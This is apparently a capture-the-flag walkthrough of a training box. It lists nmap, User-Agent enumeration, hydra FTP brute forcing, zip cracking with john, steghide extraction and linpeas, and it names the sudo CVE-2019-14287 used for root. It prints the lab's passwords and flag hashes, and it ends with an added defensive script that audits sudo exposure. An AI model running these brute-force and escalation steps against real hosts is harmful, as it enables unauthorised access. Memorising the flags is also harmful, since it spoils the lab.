nmap -A 10.10.119.64
Codename
(secret codename) Agent R
A to Z
curl
Copy as cURL
curl 'http://10.10.119.64/' -H 'User-Agent: meow' -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8' -H 'Accept-Language: en-US,en;q=0.5' --compressed -H 'Connection: keep-alive' -H 'Upgrade-Insecure-Requests: 1' -H 'Cache-Control: max-age=0, no-cache' -H 'Pragma: no-cache'
import requests

# Try each letter A-Z as the User-Agent and compare the response lengths
for i in "ABCDEFGHIJKLMNOPQRSTUVWXYZ":
    headers = {
        'User-Agent': i,
        'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
        'Accept-Language': 'en-US,en;q=0.5',
        'Connection': 'keep-alive',
        'Upgrade-Insecure-Requests': '1',
        'Cache-Control': 'max-age=0, no-cache',
        'Pragma': 'no-cache',
    }
    response = requests.get('http://10.10.119.64/', headers=headers).text
    # Print the letter and the body length; the odd length out is the one to look at
    print(i, len(response))
218
C
So the guess is User-Agent: C
Send a request with User-Agent set to C
chris
hydra -l chris -P /opt/rockyou.txt ftp://10.10.119.64
chris
crystal
ftp 10.10.119.64
ls
Look at the files on the FTP server
get <filename>
Download the files one by one
cat To_agentJ.txt
strings cutie.png
foremost cutie.png
unzip
7z x 00000067.zip
zip2john 00000067.zip > j.txt
john j.txt --wordlist=/opt/rockyou.txt
alien
7z x 00000067.zip
alien
and the extraction completes
QXJlYTUx
base64 -d <<< QXJlYTUx
Area51
cute-alien.jpg
Decrypt with steghide
steghide extract -sf cute-alien.jpg
Area51
message.txt
james
hackerrules!
user_flag.txt
b03d975e8c92a7c04146cfa7a5a313c7
sudo -l
/bin/bash
Roswell alien autopsy
scp linpeas.sh [email protected]:/tmp
bash linpeas.sh | tee meow.txt
Sudo 1.8.21p2
CVE-2019-14287
james
b53a02f55b57d4439e3341834d70c062
DesKel
aka Agent R
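For the defender's side of the CVE-2019-14287 finding above, here is an added example (not part of the original write-up): a Python check that marks a host as exposed when its sudo version predates 1.8.28, the release that fixed the CVE, and its sudoers file has a Runas list combining ALL with a negated root. The function names and the sudoers sample are constructed for illustration.

```python
import re

FIXED = (1, 8, 28)  # sudo release that fixed CVE-2019-14287

def parse_sudo_version(text):
    """Turn 'Sudo 1.8.21p2' into (1, 8, 21, 2); the patch level defaults to 0."""
    m = re.search(r"(\d+)\.(\d+)\.(\d+)(?:p(\d+))?", text)
    if not m:
        raise ValueError(f"no sudo version in {text!r}")
    return tuple(int(g or 0) for g in m.groups())

def version_affected(text):
    return parse_sudo_version(text)[:3] < FIXED

def risky_rules(sudoers_text):
    """Return rules whose Runas user list pairs ALL with a negated root."""
    hits = []
    for raw in sudoers_text.splitlines():
        # Drop comments and #include lines, but keep '#0'-style numeric UIDs.
        line = re.sub(r"#(?!\d).*", "", raw).strip()
        if not line or line.startswith("Defaults") or "=" not in line:
            continue
        for m in re.finditer(r"\(([^)]*)\)", line.split("=", 1)[1]):
            users = [u.strip() for u in m.group(1).split(":")[0].split(",")]
            if "ALL" in users and any(u in ("!root", "!#0") for u in users):
                hits.append(line)
                break
    return hits

def audit(version_text, sudoers_text):
    affected, rules = version_affected(version_text), risky_rules(sudoers_text)
    return {"affected_version": affected, "risky_rules": rules,
            "exposed": affected and bool(rules)}

# Constructed sudoers sample (hypothetical users), not taken from the target.
SAMPLE_SUDOERS = """\
Defaults env_reset
root   ALL=(ALL:ALL) ALL
alice  ALL=(ALL, !root) /bin/bash
backup ALL=(root) /usr/bin/rsync
ops    ALL=(ALL, !#0 : ALL) /usr/bin/systemctl
"""

if __name__ == "__main__":
    print(audit("Sudo 1.8.21p2", SAMPLE_SUDOERS))
```

Upgrading sudo to 1.8.28 or later closes the issue; until then, replace the negated Runas lists the check reports with an explicit list of allowed users.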